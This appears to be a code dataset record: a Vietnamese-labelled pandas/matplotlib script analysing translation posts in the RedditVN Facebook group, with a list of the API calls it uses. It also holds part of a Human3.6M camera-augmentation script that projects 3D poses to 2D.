pdfFitted = stats.lognorm.pdf(l, param[0], param[1], param[2])
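# Note (added comment): stats.lognorm.fit returns (shape, loc, scale), so param[0],
# param[1] and param[2] above are the fitted shape, location and scale parameters,
# and the same triple is reused for the KS test further down.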
fig = plt.figure()
plt.hist(reducedLikescount, bins=l, density=True)
plt.plot(l, pdfFitted, "r-")
plt.title("Ước lượng phân bố")
plt.xlabel("Số bài viết (đơn vị: {:d} bài)".format(sc))
plt.ylabel("Mật độ")
kstest = stats.kstest(reducedLikescount, 'lognorm', param)
plt.text(7, 0.5, "Model: lognorm\nShape = {:f}\nLoc = {:f}\nScale = {:f}\nKS-test:\nD = {:f}\np-value: {:f}".format(param[0], param[1], param[2], kstest.statistic, kstest.pvalue), fontsize=16)
plt.show()
del sc, reducedLikescount, l, param, pdfFitted, fig, kstest
#%%
######################################################
# statistics of translators
print("Tổng số dịch giả: {:d}".format(translators.size))
print("Mỗi dịch giả trung bình dịch {:.0f} bài.".format(totalFiltered / translators.size))
print("Dịch giả chăm chỉ nhất: {} (https://facebook.com/{}) với {} bài.".format(translators.loc[translatorsStats[('post_id', 'size')].idxmax()]["user_name"], translatorsStats[('post_id', 'size')].idxmax(), translatorsStats[('post_id', 'size')].max()))
print("Dịch giả dễ thương nhất: {} (https://facebook.com/{}) với tổng cộng {} like.".format(translators.loc[translatorsStats[('likes_count', 'sum')].idxmax()]["user_name"], translatorsStats[('likes_count', 'sum')].idxmax(), translatorsStats[('likes_count', 'sum')].max()))
print("Dịch giả hay được cưng yêu nhất: {} (https://facebook.com/{}) với trung bình {:.0f} like mỗi bài.".format(translators.loc[translatorsStats[('likes_count', 'mean')].idxmax()]["user_name"], translatorsStats[('likes_count', 'mean')].idxmax(), translatorsStats[('likes_count', 'mean')].max()))
postscountMarkpoints = [10, 20, 50, 100, 200]
for i in postscountMarkpoints:
p = (translatorsStats[("post_id", "size")] >= i).sum()
print("{:d} dịch giả ({:.2%}) có {:d} bài dịch trở lên.".format(p, p / translators.size, i))
del postscountMarkpoints, i, p
#%%
######################################################
# reddit posts verification
patternStr = r"https?://www\.reddit\.com/r/\w+/comments/(\w{1,6})/|https?://redd\.it/(\w{1,6})"
dfLinks = df["message"].str.extractall(patternStr)
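# Example (added comment, not part of the original): a message containing
# "https://www.reddit.com/r/aww/comments/abc123/..." yields "abc123" in capture group 0,
# while a short link "https://redd.it/abc123" yields "abc123" in capture group 1.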
dfLinksList = dfLinks.groupby(level=0)[0].apply(list) + dfLinks.groupby(level=0)[1].apply(list)
dfLinksListCount = dfLinksList.apply(lambda x: len(set([y for y in x if str(y) != 'nan'])))
multilinksSubmissionCount = (dfLinksListCount > 1).sum()
print("Số bài dịch có 2 link reddit trở lên trong bài là {:d}, chiếm {:.2%} tổng số bài.".format(multilinksSubmissionCount, multilinksSubmissionCount / totalFiltered))
del patternStr, dfLinks, dfLinksList, dfLinksListCount, multilinksSubmissionCount
#%%
######################################################
# ratio of karma and comments on submissions
meanKarma, meanCommentsCount = df[["r_score", "r_num_comments"]].mean()
print("Karma trung bình: {:.0f}.".format(meanKarma))
print("Số bình luận trung bình: {:.0f}.".format(meanCommentsCount))
print("Tỉ lệ Karma trên bình luận: {:.2f}.".format(meanKarma / meanCommentsCount))
del meanKarma, meanCommentsCount
#%%
######################################################
# choice of submission and interest reception
dfChoices = df[["r", "r_score", "likes_count", "created_time", "r_created_utc"]].copy()
dfChoices["delta"] = dfChoices["created_time"] - dfChoices["r_created_utc"]
# minor filter
irr = (dfChoices["delta"].dt.days < 0).sum()
print("{:d} bài có delta < 0, chiếm {:.2%} tổng số.".format(irr, irr / totalFiltered))
dfChoices.drop(dfChoices[dfChoices["delta"].dt.days < 0].index, inplace=True)
# convert delta to days in float
dfChoices["days_f"] = dfChoices["delta"] / np.timedelta64(1, "D")
# general stats
print("Khoảng cách xa nhất: {}. Link: https://www.facebook.com/groups/redditvietnam/permalink/{}.".format(dfChoices["delta"].max(), df.loc[dfChoices["delta"].idxmax()]["post_raw_id"]))
delays = [1, 7, 14, 30, 90, 180, 360, 720, 1080, 1800]
sampleSize = len(dfChoices.index)
for i in delays:
p = (dfChoices["days_f"] >= i).sum()
print("{:d} submission ({:.2%}) được dịch sau {:d} ngày.".format(p, p / sampleSize, i))
# distribution of delays
fig1, ax1 = plt.subplots()
bins = np.arange(0, 3500, 100)
ax1.hist(dfChoices["days_f"], bins=bins, rwidth=0.8)
ax1.set_title("Bao lâu submission mới được dịch?")
ax1.set_xlabel("Số ngày")
ax1.set_ylabel("Số bài")
fig1.show()
# distribution of delays, karma and likes
fig2, ax2 = plt.subplots()
g2 = ax2.scatter(dfChoices["r_score"].values, dfChoices["days_f"].values, c=dfChoices["likes_count"].values, cmap="YlOrBr", edgecolors="None", s=30, marker="o", alpha=0.7)
ax2.set_title("Tương tác của submission trên Reddit và RedditVN")
ax2.set_xlabel("Karma trên Reddit", fontsize=16)
ax2.set_ylabel("Khoảng cách giữa bài dịch và bài gốc (ngày)")
fig2.colorbar(g2, ax=ax2)
fig2.show()
# cropped distribution of delays, karma and likes
def plotCrop(rScoreCrop, daysFCrop):
dfChoicesCrop = dfChoices[(dfChoices["r_score"] < rScoreCrop) & (dfChoices["days_f"] < daysFCrop)]
fig3, ax3 = plt.subplots()
g3 = ax3.scatter(dfChoicesCrop["r_score"].values, dfChoicesCrop["days_f"].values, c=dfChoicesCrop["likes_count"].values, cmap="YlOrBr", edgecolors="None", s=30, marker="o", alpha=0.7)
ax3.set_title("Tương tác của submission trên Reddit và RedditVN")
ax3.set_xlabel("Karma trên Reddit")
ax3.set_ylabel("Khoảng cách giữa bài dịch và bài gốc (ngày)")
fig3.colorbar(g3, ax=ax3)
fig3.show()
# distribution of karma and likes
fig4 = plt.figure()
ax4 = fig4.add_subplot(121)
ax4.scatter(dfChoicesCrop["r_score"].values, dfChoicesCrop["likes_count"].values, alpha=0.7, marker=".")
ax4.set_title("So sánh karma và like")
ax4.set_xlabel("Karma trên Reddit")
ax4.set_ylabel("Like trên Facebook")
ax5 = fig4.add_subplot(122)
ax5.scatter(dfChoicesCrop["days_f"].values, dfChoicesCrop["likes_count"].values, alpha=0.7, marker=".")
ax5.set_title("So sánh độ trễ và like")
ax5.set_xlabel("Độ trễ")
ax5.set_ylabel("Like trên Facebook")
fig4.show()
plotCrop(100000, 1200)
plotCrop(100000, 7)
plotCrop(100000, 1)
del irr, dfChoices, delays, sampleSize, i, p, fig1, ax1, bins, fig2, ax2, g2
|
[
"matplotlib.pyplot.title",
"pandas.read_csv",
"matplotlib.pyplot.figure",
"numpy.arange",
"pandas.Grouper",
"matplotlib.pyplot.xlabel",
"scipy.stats.lognorm.pdf",
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.set_cmap",
"matplotlib.pyplot.subplots",
"scipy.stats.kstest",
"numpy.size",
"matplotlib.pyplot.show",
"math.ceil",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.barh",
"scipy.stats.lognorm.fit",
"pandas.to_datetime",
"matplotlib.pyplot.ylabel",
"pandas.crosstab",
"matplotlib.pyplot.hist",
"matplotlib.pyplot.plot",
"numpy.timedelta64",
"mpl_toolkits.axes_grid1.AxesGrid"
] |
[((598, 686), 'pandas.read_csv', 'pd.read_csv', (['infile'], {'encoding': '"""utf-8"""', 'index_col': 'None', 'header': '(0)', 'lineterminator': '"""\n"""'}), "(infile, encoding='utf-8', index_col=None, header=0,\n lineterminator='\\n')\n", (609, 686), True, 'import pandas as pd\n'), ((1883, 1926), 'pandas.crosstab', 'pd.crosstab', ([], {'index': "df['r']", 'columns': '"""count"""'}), "(index=df['r'], columns='count')\n", (1894, 1926), True, 'import pandas as pd\n'), ((2351, 2429), 'math.ceil', 'math.ceil', (["((df.iloc[-1]['created_time'] - df.iloc[0]['created_time']).days / 7)"], {}), "((df.iloc[-1]['created_time'] - df.iloc[0]['created_time']).days / 7)\n", (2360, 2429), False, 'import math\n'), ((4142, 4154), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4152, 4154), True, 'import matplotlib.pyplot as plt\n'), ((4155, 4197), 'matplotlib.pyplot.title', 'plt.title', (['"""Thống kê tổng số post và like"""'], {}), "('Thống kê tổng số post và like')\n", (4164, 4197), True, 'import matplotlib.pyplot as plt\n'), ((4689, 4734), 'matplotlib.pyplot.legend', 'plt.legend', (['handles', 'labels'], {'loc': '"""upper left"""'}), "(handles, labels, loc='upper left')\n", (4699, 4734), True, 'import matplotlib.pyplot as plt\n'), ((4735, 4745), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4743, 4745), True, 'import matplotlib.pyplot as plt\n'), ((5783, 5795), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (5792, 5795), True, 'import numpy as np\n'), ((5807, 5821), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5819, 5821), True, 'import matplotlib.pyplot as plt\n'), ((5822, 5848), 'matplotlib.pyplot.barh', 'plt.barh', (['y', "rTop['count']"], {}), "(y, rTop['count'])\n", (5830, 5848), True, 'import matplotlib.pyplot as plt\n'), ((5849, 5897), 'matplotlib.pyplot.title', 'plt.title', (['"""Những Subreddit nhiều bài dịch nhất"""'], {}), "('Những Subreddit nhiều bài dịch nhất')\n", (5858, 5897), True, 'import matplotlib.pyplot as plt\n'), ((5898, 5928), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Số bài được dịch"""'], {}), "('Số bài được dịch')\n", (5908, 5928), True, 'import matplotlib.pyplot as plt\n'), ((6120, 6130), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6128, 6130), True, 'import matplotlib.pyplot as plt\n'), ((6260, 6273), 'numpy.arange', 'np.arange', (['Ni'], {}), '(Ni)\n', (6269, 6273), True, 'import numpy as np\n'), ((6358, 6402), 'matplotlib.pyplot.title', 'plt.title', (['"""Những Subreddit được chú ý nhất"""'], {}), "('Những Subreddit được chú ý nhất')\n", (6367, 6402), True, 'import matplotlib.pyplot as plt\n'), ((6403, 6445), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tổng số cảm xúc và bình luận"""'], {}), "('Tổng số cảm xúc và bình luận')\n", (6413, 6445), True, 'import matplotlib.pyplot as plt\n'), ((6488, 6502), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (6498, 6502), True, 'import matplotlib.pyplot as plt\n'), ((8174, 8188), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (8186, 8188), True, 'import matplotlib.pyplot as plt\n'), ((8189, 8218), 'matplotlib.pyplot.set_cmap', 'plt.set_cmap', (['"""nipy_spectral"""'], {}), "('nipy_spectral')\n", (8201, 8218), True, 'import matplotlib.pyplot as plt\n'), ((8400, 8447), 'matplotlib.pyplot.title', 'plt.title', (['"""Số bài dịch mỗi sub theo thời gian"""'], {}), "('Số bài dịch mỗi sub theo thời gian')\n", (8409, 8447), True, 'import matplotlib.pyplot as plt\n'), ((8448, 8462), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['""""""'], 
{}), "('')\n", (8458, 8462), True, 'import matplotlib.pyplot as plt\n'), ((8463, 8477), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (8473, 8477), True, 'import matplotlib.pyplot as plt\n'), ((8510, 8520), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8518, 8520), True, 'import matplotlib.pyplot as plt\n'), ((8825, 8839), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (8837, 8839), True, 'import matplotlib.pyplot as plt\n'), ((9015, 9057), 'matplotlib.pyplot.title', 'plt.title', (['"""Like trung bình theo giờ đăng"""'], {}), "('Like trung bình theo giờ đăng')\n", (9024, 9057), True, 'import matplotlib.pyplot as plt\n'), ((9058, 9075), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Giờ"""'], {}), "('Giờ')\n", (9068, 9075), True, 'import matplotlib.pyplot as plt\n'), ((9076, 9093), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Thứ"""'], {}), "('Thứ')\n", (9086, 9093), True, 'import matplotlib.pyplot as plt\n'), ((9094, 9117), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {'ax': 'ax'}), '(im, ax=ax)\n', (9106, 9117), True, 'import matplotlib.pyplot as plt\n'), ((9118, 9128), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9126, 9128), True, 'import matplotlib.pyplot as plt\n'), ((9407, 9421), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (9419, 9421), True, 'import matplotlib.pyplot as plt\n'), ((9597, 9641), 'matplotlib.pyplot.title', 'plt.title', (['"""Số bài trung bình theo giờ đăng"""'], {}), "('Số bài trung bình theo giờ đăng')\n", (9606, 9641), True, 'import matplotlib.pyplot as plt\n'), ((9642, 9659), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Giờ"""'], {}), "('Giờ')\n", (9652, 9659), True, 'import matplotlib.pyplot as plt\n'), ((9660, 9677), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Thứ"""'], {}), "('Thứ')\n", (9670, 9677), True, 'import matplotlib.pyplot as plt\n'), ((9678, 9701), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {'ax': 'ax'}), '(im, ax=ax)\n', (9690, 9701), True, 'import matplotlib.pyplot as plt\n'), ((9702, 9712), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9710, 9712), True, 'import matplotlib.pyplot as plt\n'), ((9940, 9952), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9950, 9952), True, 'import matplotlib.pyplot as plt\n'), ((9960, 10129), 'mpl_toolkits.axes_grid1.AxesGrid', 'AxesGrid', (['fig', '(111)'], {'nrows_ncols': '(Nrow, Ncol)', 'axes_pad': '(0.5)', 'share_all': '(True)', 'label_mode': '"""L"""', 'cbar_location': '"""right"""', 'cbar_mode': '"""single"""', 'cbar_pad': '(0.1)', 'aspect': '(False)'}), "(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True,\n label_mode='L', cbar_location='right', cbar_mode='single', cbar_pad=0.1,\n aspect=False)\n", (9968, 10129), False, 'from mpl_toolkits.axes_grid1 import AxesGrid\n'), ((10766, 10776), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10774, 10776), True, 'import matplotlib.pyplot as plt\n'), ((11035, 11047), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (11045, 11047), True, 'import matplotlib.pyplot as plt\n'), ((11055, 11224), 'mpl_toolkits.axes_grid1.AxesGrid', 'AxesGrid', (['fig', '(111)'], {'nrows_ncols': '(Nrow, Ncol)', 'axes_pad': '(0.5)', 'share_all': '(True)', 'label_mode': '"""L"""', 'cbar_location': '"""right"""', 'cbar_mode': '"""single"""', 'cbar_pad': '(0.1)', 'aspect': '(False)'}), "(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True,\n label_mode='L', cbar_location='right', cbar_mode='single', 
cbar_pad=0.1,\n aspect=False)\n", (11063, 11224), False, 'from mpl_toolkits.axes_grid1 import AxesGrid\n'), ((11860, 11870), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11868, 11870), True, 'import matplotlib.pyplot as plt\n'), ((12796, 12810), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (12808, 12810), True, 'import matplotlib.pyplot as plt\n'), ((12947, 12975), 'matplotlib.pyplot.title', 'plt.title', (['"""Phân bố số like"""'], {}), "('Phân bố số like')\n", (12956, 12975), True, 'import matplotlib.pyplot as plt\n'), ((12976, 12997), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Số like"""'], {}), "('Số like')\n", (12986, 12997), True, 'import matplotlib.pyplot as plt\n'), ((12998, 13023), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Số bài viết"""'], {}), "('Số bài viết')\n", (13008, 13023), True, 'import matplotlib.pyplot as plt\n'), ((13024, 13034), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13032, 13034), True, 'import matplotlib.pyplot as plt\n'), ((13239, 13278), 'numpy.arange', 'np.arange', (['(0)', '(4000 / sc)', '(100 / (sc * 2))'], {}), '(0, 4000 / sc, 100 / (sc * 2))\n', (13248, 13278), True, 'import numpy as np\n'), ((13287, 13323), 'scipy.stats.lognorm.fit', 'stats.lognorm.fit', (['reducedLikescount'], {}), '(reducedLikescount)\n', (13304, 13323), False, 'from scipy import stats\n'), ((13336, 13386), 'scipy.stats.lognorm.pdf', 'stats.lognorm.pdf', (['l', 'param[0]', 'param[1]', 'param[2]'], {}), '(l, param[0], param[1], param[2])\n', (13353, 13386), False, 'from scipy import stats\n'), ((13394, 13406), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (13404, 13406), True, 'import matplotlib.pyplot as plt\n'), ((13407, 13456), 'matplotlib.pyplot.hist', 'plt.hist', (['reducedLikescount'], {'bins': 'l', 'density': '(True)'}), '(reducedLikescount, bins=l, density=True)\n', (13415, 13456), True, 'import matplotlib.pyplot as plt\n'), ((13457, 13485), 'matplotlib.pyplot.plot', 'plt.plot', (['l', 'pdfFitted', '"""r-"""'], {}), "(l, pdfFitted, 'r-')\n", (13465, 13485), True, 'import matplotlib.pyplot as plt\n'), ((13486, 13516), 'matplotlib.pyplot.title', 'plt.title', (['"""Ước lượng phân bố"""'], {}), "('Ước lượng phân bố')\n", (13495, 13516), True, 'import matplotlib.pyplot as plt\n'), ((13573, 13593), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Mật độ"""'], {}), "('Mật độ')\n", (13583, 13593), True, 'import matplotlib.pyplot as plt\n'), ((13603, 13652), 'scipy.stats.kstest', 'stats.kstest', (['reducedLikescount', '"""lognorm"""', 'param'], {}), "(reducedLikescount, 'lognorm', param)\n", (13615, 13652), False, 'from scipy import stats\n'), ((13846, 13856), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13854, 13856), True, 'import matplotlib.pyplot as plt\n'), ((17459, 17473), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17471, 17473), True, 'import matplotlib.pyplot as plt\n'), ((17481, 17504), 'numpy.arange', 'np.arange', (['(0)', '(3500)', '(100)'], {}), '(0, 3500, 100)\n', (17490, 17504), True, 'import numpy as np\n'), ((17727, 17741), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17739, 17741), True, 'import matplotlib.pyplot as plt\n'), ((16958, 16980), 'numpy.timedelta64', 'np.timedelta64', (['(1)', '"""D"""'], {}), "(1, 'D')\n", (16972, 16980), True, 'import numpy as np\n'), ((18336, 18350), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (18348, 18350), True, 'import matplotlib.pyplot as plt\n'), ((18815, 18827), 'matplotlib.pyplot.figure', 
'plt.figure', ([], {}), '()\n', (18825, 18827), True, 'import matplotlib.pyplot as plt\n'), ((2469, 2484), 'numpy.size', 'np.size', (['series'], {}), '(series)\n', (2476, 2484), True, 'import numpy as np\n'), ((3958, 4002), 'pandas.Grouper', 'pd.Grouper', ([], {'freq': '"""M"""', 'key': '"""created_time_utc"""'}), "(freq='M', key='created_time_utc')\n", (3968, 4002), True, 'import pandas as pd\n'), ((8039, 8079), 'pandas.Grouper', 'pd.Grouper', ([], {'freq': '"""M"""', 'key': '"""created_time"""'}), "(freq='M', key='created_time')\n", (8049, 8079), True, 'import pandas as pd\n'), ((1168, 1245), 'pandas.to_datetime', 'pd.to_datetime', (["df['created_time']"], {'format': '"""%Y-%m-%dT%H:%M:%S.000Z"""', 'utc': '(True)'}), "(df['created_time'], format='%Y-%m-%dT%H:%M:%S.000Z', utc=True)\n", (1182, 1245), True, 'import pandas as pd\n'), ((1300, 1355), 'pandas.to_datetime', 'pd.to_datetime', (["df['r_created_utc']"], {'unit': '"""s"""', 'utc': '(True)'}), "(df['r_created_utc'], unit='s', utc=True)\n", (1314, 1355), True, 'import pandas as pd\n')]
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.camera.camera import CameraInfoPacket, catesian2homogenous
import ipdb
import copy
import json
import numpy as np
from camera_augmentation import h36m_cameras_intrinsic_params
from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs
from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame
H36M_KPT_IDX = [0, 1, 2, 3, 6, 7, 8, 12, 13, 14, 15, 17, 18, 19, 25, 26, 27]
RES_W, RES_H = 1000, 1000
AXIS_X, AXIS_Y, AXIS_Z = [1, 0, 0], [0, 1, 0], [0, 0, 1]
TRAIN_SUBJECTS = ['S1', 'S5', 'S6', 'S7', 'S8']
TEST_SUBJECTS = ['S9', 'S11']
IDX_TO_CAMERA = {
0: '54138969',
1: '55011271',
2: '58860488',
3: '60457274'
}
if __name__ == '__main__':
FILE_TO_3D_POSE = '/ssd/yzhan/data/benchmark/3D/h36m/annotations/gt/data_3d_h36m.npz'
PATH_TO_OUTPUT = '/ssd/ray3d/camera.intrinsic'
SUBJECT = 'S1'
YAW = 0
TRANSLATION = 2.0
PITCH = 0
CENTER_POINT = [0, 0, 1.8]
FOCAL_LENGTH_BAIS_RANGE = (np.arange(-50, 50, 10)).tolist()
CENTER_POINT_BAIS_RANGE = (np.arange(-50, 50, 10)).tolist()
cam_idx = 1 # '55011271'
camera_info = init_camera_h36m()
camera_pose = get_camera_pose(camera_info)
pose_3d = np.load(FILE_TO_3D_POSE, allow_pickle=True)['positions_3d'].item()
selected_cam = copy.deepcopy(camera_info[SUBJECT][cam_idx])
Rw2c = selected_cam.Rw2c
Tw2c = selected_cam.Tw2c
t = np.array(CENTER_POINT).reshape(3, 1)
# translation
Tw2c_translation_aumented = camera_translation(Tw2c, t, TRANSLATION)
# rotation
yaw = convertdegree2euler(YAW)
Rw2c_rotation_augmented, Tw2c_rotation_augmented = rotate_camera(Rw2c, Tw2c_translation_aumented, t,
np.array(AXIS_Z), yaw)
# pitch
pitch = convertdegree2euler(PITCH)
camera_position = - np.dot(Rw2c_rotation_augmented.T, Tw2c_rotation_augmented)
axis = np.array([-camera_position[1][0], camera_position[0][0], 0])
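    # Note (added comment, not part of the original): camera_position = -R^T t is the
    # camera centre in world coordinates, and the axis (-y, x, 0) is horizontal and
    # perpendicular to the camera's ground-plane position vector, so rotating about it
    # pitches the camera up/down relative to the scene centre point t.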
Rw2c_pitch_augmented, Tw2c_pitch_augmented = rotate_camera(Rw2c_rotation_augmented, Tw2c_rotation_augmented,
t, axis, pitch)
camera_position = - np.dot(Rw2c_pitch_augmented.T, Tw2c_pitch_augmented)
    # vary the focal length and principal point of the intrinsics
for f_bais in FOCAL_LENGTH_BAIS_RANGE:
for c_bias in CENTER_POINT_BAIS_RANGE:
K, dist_coeff = get_intrinsic(cam_idx, fx_bais=f_bais, fy_bais=f_bais, cx_bias=c_bias, cy_bias=c_bias)
camera_augmented = CameraInfoPacket(
P=None, K=K, R=Rw2c_pitch_augmented, t=Tw2c_pitch_augmented, dist_coeff=dist_coeff
)
# sanity check
invalid = False
pose_2d = {}
for sbj in pose_3d.keys():
pose_2d.setdefault(sbj, dict())
for act in pose_3d[sbj].keys():
pose_2d[sbj].setdefault(act, list())
kpt_3d = pose_3d[sbj][act][:, H36M_KPT_IDX]
kpt_3d_hom = catesian2homogenous(kpt_3d)
kpt_2d = camera_augmented.project(kpt_3d_hom)
pose_2d[sbj][act].append(kpt_2d)
if not check_in_frame(kpt_2d, RES_W, RES_H):
invalid = True
break
if invalid:
break
if invalid:
del pose_2d
continue
print('\tcam_idx:{}, FBAIS: {}, CBAIS: {}'.format(cam_idx, f_bais, c_bias))
CAMERA_PARAM_PATH = os.path.join(PATH_TO_OUTPUT, '{}'.format('json'))
POSE_2D_PATH = os.path.join(PATH_TO_OUTPUT, '{}'.format('npz'))
mkdirs(CAMERA_PARAM_PATH)
mkdirs(POSE_2D_PATH)
cameras_params = []
camera_param = {}
camera_param['id'] = h36m_cameras_intrinsic_params[cam_idx]['id']
camera_param['center'] = [camera_augmented.K[0, 2], camera_augmented.K[1, 2]]
camera_param['focal_length'] = [camera_augmented.K[0, 0], camera_augmented.K[1, 1]]
camera_param['radial_distortion'] = h36m_cameras_intrinsic_params[cam_idx]['radial_distortion']
camera_param['tangential_distortion'] = h36m_cameras_intrinsic_params[cam_idx]['tangential_distortion']
camera_param['res_w'] = h36m_cameras_intrinsic_params[cam_idx]['res_w']
camera_param['res_h'] = h36m_cameras_intrinsic_params[cam_idx]['res_h']
camera_param['azimuth'] = h36m_cameras_intrinsic_params[cam_idx]['azimuth']
camera_param['R'] = Rw2c_pitch_augmented.tolist()
camera_param['translation'] = Tw2c_pitch_augmented.tolist()
# save camera parameter
CAMERA_FILENAME = os.path.join(CAMERA_PARAM_PATH,
'TRANSLATION{}_YAW{}_PITCH{}_CAM{}_FBAIS{}_CBIAS{}.json'.format(
TRANSLATION, YAW,
PITCH, cam_idx, f_bais, c_bias))
with open(CAMERA_FILENAME, 'w') as file_obj:
json.dump([camera_param], file_obj, indent=4)
# save projected 2d pose
POSE2D_FILENAME = os.path.join(POSE_2D_PATH,
'TRANSLATION{}_YAW{}_PITCH{}_CAM{}_FBAIS{}_CBIAS{}.npz'.format(
TRANSLATION, YAW,
PITCH, cam_idx, f_bais, c_bias))
METADATA = {
'layout': 'h36m_aug',
'num_joints': 17,
'keypoints_symmetry': [[4, 5, 6, 11, 12, 13], [1, 2, 3, 14, 15, 16]]
}
np.savez(POSE2D_FILENAME, metadata=METADATA, positions_2d=pose_2d)
del pose_2d
|
[
"camera_augmentation.get_intrinsic",
"json.dump",
"copy.deepcopy",
"numpy.load",
"numpy.savez",
"lib.camera.camera.catesian2homogenous",
"os.path.dirname",
"camera_augmentation.rotate_camera",
"camera_augmentation.check_in_frame",
"camera_augmentation.camera_translation",
"lib.camera.camera.CameraInfoPacket",
"numpy.array",
"numpy.arange",
"numpy.dot",
"camera_augmentation.convertdegree2euler",
"camera_augmentation.get_camera_pose",
"camera_augmentation.init_camera_h36m",
"camera_augmentation.mkdirs"
] |
[((1249, 1267), 'camera_augmentation.init_camera_h36m', 'init_camera_h36m', ([], {}), '()\n', (1265, 1267), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1286, 1314), 'camera_augmentation.get_camera_pose', 'get_camera_pose', (['camera_info'], {}), '(camera_info)\n', (1301, 1314), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1416, 1460), 'copy.deepcopy', 'copy.deepcopy', (['camera_info[SUBJECT][cam_idx]'], {}), '(camera_info[SUBJECT][cam_idx])\n', (1429, 1460), False, 'import copy\n'), ((1615, 1655), 'camera_augmentation.camera_translation', 'camera_translation', (['Tw2c', 't', 'TRANSLATION'], {}), '(Tw2c, t, TRANSLATION)\n', (1633, 1655), False, 'from camera_augmentation import init_camera_h36m, get_camera_pose, camera_translation, mkdirs\n'), ((1682, 1706), 'camera_augmentation.convertdegree2euler', 'convertdegree2euler', (['YAW'], {}), '(YAW)\n', (1701, 1706), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((1929, 1955), 'camera_augmentation.convertdegree2euler', 'convertdegree2euler', (['PITCH'], {}), '(PITCH)\n', (1948, 1955), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((2051, 2111), 'numpy.array', 'np.array', (['[-camera_position[1][0], camera_position[0][0], 0]'], {}), '([-camera_position[1][0], camera_position[0][0], 0])\n', (2059, 2111), True, 'import numpy as np\n'), ((2161, 2240), 'camera_augmentation.rotate_camera', 'rotate_camera', (['Rw2c_rotation_augmented', 'Tw2c_rotation_augmented', 't', 'axis', 'pitch'], {}), '(Rw2c_rotation_augmented, Tw2c_rotation_augmented, t, axis, pitch)\n', (2174, 2240), False, 'from camera_augmentation import convertdegree2euler, rotate_camera, get_intrinsic, check_in_frame\n'), ((51, 76), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (66, 76), False, 'import os\n'), ((1881, 1897), 'numpy.array', 'np.array', (['AXIS_Z'], {}), '(AXIS_Z)\n', (1889, 1897), True, 'import numpy as np\n'), ((1980, 2038), 'numpy.dot', 'np.dot', (['Rw2c_rotation_augmented.T', 'Tw2c_rotation_augmented'], {}), '(Rw2c_rotation_augmented.T, Tw2c_rotation_augmented)\n', (1986, 2038), True, 'import numpy as np\n'), ((2328, 2380), 'numpy.dot', 'np.dot', (['Rw2c_pitch_augmented.T', 'Tw2c_pitch_augmented'], {}), '(Rw2c_pitch_augmented.T, Tw2c_pitch_augmented)\n', (2334, 2380), True, 'import numpy as np\n'), ((1103, 1125), 'numpy.arange', 'np.arange', (['(-50)', '(50)', '(10)'], {}), '(-50, 50, 10)\n', (1112, 1125), True, 'import numpy as np\n'), ((1167, 1189), 'numpy.arange', 'np.arange', (['(-50)', '(50)', '(10)'], {}), '(-50, 50, 10)\n', (1176, 1189), True, 'import numpy as np\n'), ((1527, 1549), 'numpy.array', 'np.array', (['CENTER_POINT'], {}), '(CENTER_POINT)\n', (1535, 1549), True, 'import numpy as np\n'), ((2545, 2635), 'camera_augmentation.get_intrinsic', 'get_intrinsic', (['cam_idx'], {'fx_bais': 'f_bais', 'fy_bais': 'f_bais', 'cx_bias': 'c_bias', 'cy_bias': 'c_bias'}), '(cam_idx, fx_bais=f_bais, fy_bais=f_bais, cx_bias=c_bias,\n cy_bias=c_bias)\n', (2558, 2635), False, 'from camera_augmentation 